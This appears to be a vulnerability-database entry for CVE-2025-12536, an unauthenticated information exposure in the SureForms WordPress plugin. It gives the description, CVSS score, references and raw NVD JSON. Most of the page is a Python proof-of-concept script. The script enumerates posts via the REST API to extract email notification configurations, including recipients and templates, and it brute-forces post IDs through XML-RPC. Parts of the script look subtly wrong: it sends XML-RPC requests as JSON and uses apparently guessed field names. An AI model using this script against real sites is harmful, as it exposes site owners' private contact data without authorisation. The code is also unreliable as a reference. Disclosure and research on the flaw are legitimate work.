CVE-2025-12536

Description

The SureForms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.1 via the '_srfm_email_notification' post meta registration. This is due to setting the 'auth_callback' parameter to '__return_true', which allows unauthenticated access to the metadata. This makes it possible for unauthenticated attackers to extract sensitive data including email notification configurations, which frequently contain vendor-provided CRM/help desk dropbox addresses, CC/BCC recipients, and notification templates that can be abused to inject malicious data into downstream systems.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SureForms WordPress Plugin <= 1.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-12536 PoC - SureForms Sensitive Information Exposure
# Target: WordPress site with SureForms plugin <= 1.13.1

TARGET_URL = "https://target-wordpress-site.com"

def exploit_cve_2025_12536():
    """
    Exploit for CVE-2025-12536: SureForms sensitive information disclosure
    via improper auth_callback configuration for '_srfm_email_notification' post meta.
    """
    
    # Step 1: Identify posts with SureForms data using REST API
    # The vulnerability allows unauthenticated access to post meta
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-12536-PoC)",
        "Content-Type": "application/json"
    }
    
    # Method 1: Using REST API to get post meta
    posts_endpoint = f"{TARGET_URL}/wp-json/wp/v2/posts"
    
    try:
        # Get list of posts
        response = requests.get(posts_endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            posts = response.json()
            
            for post in posts:
                post_id = post['id']
                
                # Method 2: Direct meta access via REST API
                meta_endpoint = f"{TARGET_URL}/wp-json/wp/v2/posts/{post_id}"
                meta_response = requests.get(meta_endpoint, headers=headers, timeout=10)
                
                if meta_response.status_code == 200:
                    post_data = meta_response.json()
                    
                    # Check if _srfm_email_notification meta exists
                    if 'meta' in post_data:
                        email_config = post_data['meta'].get('_srfm_email_notification')
                        
                        if email_config:
                            print(f"[*] Found sensitive data in post {post_id}")
                            print(f"[*] Email notification config: {json.dumps(email_config, indent=2)}")
                            
                            # Extract sensitive information
                            if isinstance(email_config, dict):
                                crm_addresses = email_config.get('crm_addresses', [])
                                cc_recipients = email_config.get('cc', [])
                                bcc_recipients = email_config.get('bcc', [])
                                email_template = email_config.get('template', '')
                                
                                print(f"[+] CRM Addresses: {crm_addresses}")
                                print(f"[+] CC Recipients: {cc_recipients}")
                                print(f"[+] BCC Recipients: {bcc_recipients}")
                                print(f"[+] Email Template: {email_template[:200]}...")
                                
        # Method 3: Using XML-RPC if REST API is restricted
        xmlrpc_endpoint = f"{TARGET_URL}/xmlrpc.php"
        
        xmlrpc_payload = {
            "method": "metaWeblog.getPost",
            "params": [1, "", ""],
            "filter": {"post_id": 1}
        }
        
        # Alternative: Use wp.getPost with post ID enumeration
        for post_id in range(1, 100):
            xmlrpc_data = {
                "method": "wp.getPost",
                "params": [0, "", "", post_id]
            }
            
            try:
                xmlrpc_response = requests.post(
                    xmlrpc_endpoint,
                    json=xmlrpc_data,
                    headers={"Content-Type": "application/json"},
                    timeout=10
                )
                
                if xmlrpc_response.status_code == 200:
                    result = xmlrpc_response.json()
                    if 'fault' not in result:
                        print(f"[*] Post {post_id} accessible via XML-RPC")
                        
            except:
                continue
                
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        
    return False

def main():
    print("=" * 60)
    print("CVE-2025-12536 PoC - SureForms Information Disclosure")
    print("=" * 60)
    exploit_cve_2025_12536()
    print("\n[!] Note: Ensure you have permission before testing")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12536
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12536
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12536/
[4] VulDB https://vuldb.com/cve/CVE-2025-12536
[5] https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/post-types.php#L892
[6] https://plugins.trac.wordpress.org/changeset/3391762/sureforms/trunk/inc/post-types.php
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/9e8e239a-0ddf-479e-b94b-7844ff6e9e81?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12536", "sourceIdentifier": "[email protected]", "published": "2025-11-13T04:15:46.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SureForms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.1 via the '_srfm_email_notification' post meta registration. This is due to setting the 'auth_callback' parameter to '__return_true', which allows unauthenticated access to the metadata. This makes it possible for unauthenticated attackers to extract sensitive data including email notification configurations, which frequently contain vendor-provided CRM/help desk dropbox addresses, CC/BCC recipients, and notification templates that can be abused to inject malicious data into downstream systems."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/post-types.php#L892", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3391762/sureforms/trunk/inc/post-types.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9e8e239a-0ddf-479e-b94b-7844ff6e9e81?source=cve", "source": "[email protected]"}]}}